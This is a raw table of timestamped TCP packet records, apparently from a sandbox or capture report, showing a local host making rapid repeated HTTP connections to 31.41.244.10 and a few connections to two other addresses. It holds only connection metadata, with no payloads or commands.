Sep 6, 2024 10:00:15.606064081 CEST	80	51359	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:15.606161118 CEST	51358	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.606211901 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.606513023 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:15.611323118 CEST	80	51359	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:16.306015968 CEST	80	51359	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:16.308592081 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.425224066 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.425565004 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.430510044 CEST	80	51359	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:16.430526972 CEST	80	51360	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:16.430624962 CEST	51359	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.430666924 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.430799961 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:16.435561895 CEST	80	51360	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.132237911 CEST	80	51360	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.132636070 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.137120008 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.137403011 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.142266989 CEST	80	51360	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.142283916 CEST	80	51361	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.144624949 CEST	51360	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.144651890 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.145220041 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.149986982 CEST	80	51361	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.622242928 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:17.622287035 CEST	443	51362	34.107.243.93	192.168.2.7
Sep 6, 2024 10:00:17.622623920 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:17.624088049 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:17.624102116 CEST	443	51362	34.107.243.93	192.168.2.7
Sep 6, 2024 10:00:17.868093967 CEST	80	51361	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.868192911 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.975328922 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:17.979424000 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.979732037 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.980258942 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:17.984487057 CEST	80	51361	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.984707117 CEST	80	51363	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:17.985780954 CEST	51361	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.985814095 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.986216068 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:17.990984917 CEST	80	51363	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:18.098575115 CEST	443	51362	34.107.243.93	192.168.2.7
Sep 6, 2024 10:00:18.098709106 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:18.106168985 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:18.106178999 CEST	443	51362	34.107.243.93	192.168.2.7
Sep 6, 2024 10:00:18.106265068 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:18.106355906 CEST	443	51362	34.107.243.93	192.168.2.7
Sep 6, 2024 10:00:18.106462955 CEST	51362	443	192.168.2.7	34.107.243.93
Sep 6, 2024 10:00:18.109494925 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:18.114310026 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:18.173741102 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:18.178575993 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:18.203846931 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:18.209569931 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:18.214437962 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:18.304064035 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:18.370600939 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:18.370623112 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:18.678088903 CEST	80	51363	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:18.678190947 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.680931091 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.681250095 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.685967922 CEST	80	51363	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:18.686028957 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:18.686043024 CEST	51363	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.686161995 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.686371088 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:18.691131115 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.311003923 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.311021090 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.311113119 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.311386108 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.311461926 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.311691046 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.311819077 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.423132896 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.423564911 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.428384066 CEST	80	51364	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.428419113 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:20.428504944 CEST	51364	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.428523064 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.428741932 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:20.433556080 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.122514009 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.122893095 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.126748085 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.131541014 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.351931095 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.352027893 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.462219000 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.462507963 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.467355967 CEST	80	51366	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.467453957 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.467638016 CEST	80	51365	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:21.467719078 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.467767000 CEST	51365	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:21.472462893 CEST	80	51366	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.181114912 CEST	80	51366	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.185611963 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.193612099 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.194060087 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.198743105 CEST	80	51366	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.198939085 CEST	80	51367	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.199100971 CEST	51366	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.199146986 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.199460983 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:22.204204082 CEST	80	51367	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.901736021 CEST	80	51367	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:22.903567076 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.014945984 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.014945984 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.019916058 CEST	80	51368	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.020497084 CEST	80	51367	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.021416903 CEST	51367	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.021462917 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.022586107 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.027390957 CEST	80	51368	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.746020079 CEST	80	51368	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.746144056 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.749344110 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.749661922 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.754282951 CEST	80	51368	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.754360914 CEST	51368	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.754422903 CEST	80	51369	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:23.754643917 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.755012035 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:23.759777069 CEST	80	51369	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:24.479108095 CEST	80	51369	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:24.479212046 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.594010115 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.594341993 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.599294901 CEST	80	51369	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:24.599375963 CEST	51369	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.599452019 CEST	80	51370	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:24.599562883 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.599690914 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:24.613049984 CEST	80	51370	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:25.305619955 CEST	80	51370	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:25.305713892 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.308618069 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.308944941 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.313777924 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:25.313842058 CEST	80	51370	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:25.313920021 CEST	51370	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.313925982 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.314163923 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:25.319078922 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:26.993735075 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:26.993973970 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:26.994128942 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:26.994469881 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:26.994637966 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:26.994638920 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:26.994638920 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.105199099 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.105532885 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.111500978 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:27.111824989 CEST	80	51371	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:27.112204075 CEST	51371	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.112221003 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.112627983 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:27.118159056 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:28.270910025 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:28.371134043 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:28.633817911 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:28.633903027 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:28.634351969 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:28.634541988 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:28.635132074 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:28.636564016 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:28.637268066 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:28.637595892 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:28.975543976 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.277605057 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:29.477649927 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:29.562271118 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:29.562426090 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.562860966 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:29.563534975 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.565963030 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:29.565978050 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:29.566008091 CEST	80	51373	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:29.566018105 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:29.566028118 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:29.566037893 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:29.566162109 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.566433907 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.757587910 CEST	80	51372	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:29.758553982 CEST	51372	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:29.759769917 CEST	80	51373	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:31.471040010 CEST	80	51373	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:31.471441031 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.471781015 CEST	80	51373	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:31.472059965 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.588073015 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.588485956 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.593156099 CEST	80	51373	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:31.593254089 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:31.593374968 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.593374968 CEST	51373	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.593614101 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:31.598457098 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.245376110 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.245487928 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.246284008 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.246742964 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.246783018 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.246864080 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.247617960 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.248153925 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.249233961 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.249536037 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.254257917 CEST	80	51374	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.254287004 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:33.254354000 CEST	51374	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.254389048 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.254837036 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:33.259669065 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:34.195879936 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:34.196059942 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:34.309346914 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:34.309670925 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:34.648752928 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:35.235855103 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:35.235956907 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:35.289906025 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:35.372392893 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.275003910 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.275131941 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.558144093 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.682884932 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.682974100 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.683507919 CEST	80	51376	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.683521032 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.683531046 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.683540106 CEST	80	51376	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.683614016 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.683657885 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.683795929 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.683866024 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.684029102 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.684303999 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.684319973 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.684444904 CEST	51375	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:36.688744068 CEST	80	51376	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:36.689171076 CEST	80	51375	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:37.377285004 CEST	80	51376	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:37.377480030 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.380264997 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.380640984 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.385293961 CEST	80	51376	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:37.385381937 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:37.385412931 CEST	51376	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.385484934 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.388587952 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:37.393369913 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:38.096359968 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:38.096580982 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:38.220523119 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:38.220523119 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:38.565246105 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.178184986 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.254940987 CEST	80	51378	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.254952908 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.254961967 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.254971027 CEST	80	51377	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.255659103 CEST	51377	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.255685091 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.256309032 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.261266947 CEST	80	51378	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.581146955 CEST	49844	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:39.581145048 CEST	49849	80	192.168.2.7	34.107.221.82
Sep 6, 2024 10:00:39.589112997 CEST	80	49849	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:39.589133024 CEST	80	49844	34.107.221.82	192.168.2.7
Sep 6, 2024 10:00:39.979912043 CEST	80	51378	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.980216026 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.983582973 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.983850956 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.988873005 CEST	80	51379	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.990004063 CEST	80	51378	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:39.992841959 CEST	51378	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.992917061 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.993243933 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:39.998083115 CEST	80	51379	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:40.699995041 CEST	80	51379	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:40.700134039 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.814601898 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.814891100 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.819772959 CEST	80	51380	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:40.819855928 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.820183992 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.820218086 CEST	80	51379	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:40.820280075 CEST	51379	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:40.824938059 CEST	80	51380	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:41.584321022 CEST	80	51380	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:41.584465981 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.587318897 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.587656021 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.592366934 CEST	80	51380	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:41.592533112 CEST	51380	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.592588902 CEST	80	51381	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:41.592684031 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.592982054 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:41.597760916 CEST	80	51381	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:42.322478056 CEST	80	51381	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:42.322635889 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.429572105 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.429990053 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.434868097 CEST	80	51381	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:42.434885025 CEST	80	51382	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:42.436862946 CEST	51381	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.436901093 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.437104940 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:42.442491055 CEST	80	51382	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.162528038 CEST	80	51382	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.162630081 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.166188955 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.166507006 CEST	51383	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.171281099 CEST	80	51382	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.171390057 CEST	51382	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.171904087 CEST	80	51383	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.172015905 CEST	51383	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.172321081 CEST	51383	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.177141905 CEST	80	51383	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.875505924 CEST	80	51383	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.875686884 CEST	51383	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.986011028 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.986011028 CEST	51383	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.990884066 CEST	80	51384	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.991127968 CEST	80	51383	31.41.244.10	192.168.2.7
Sep 6, 2024 10:00:43.991583109 CEST	51384	80	192.168.2.7	31.41.244.10
Sep 6, 2024 10:00:43.991583109 CEST	51383	80	192.168.2.7	31.41.244.10
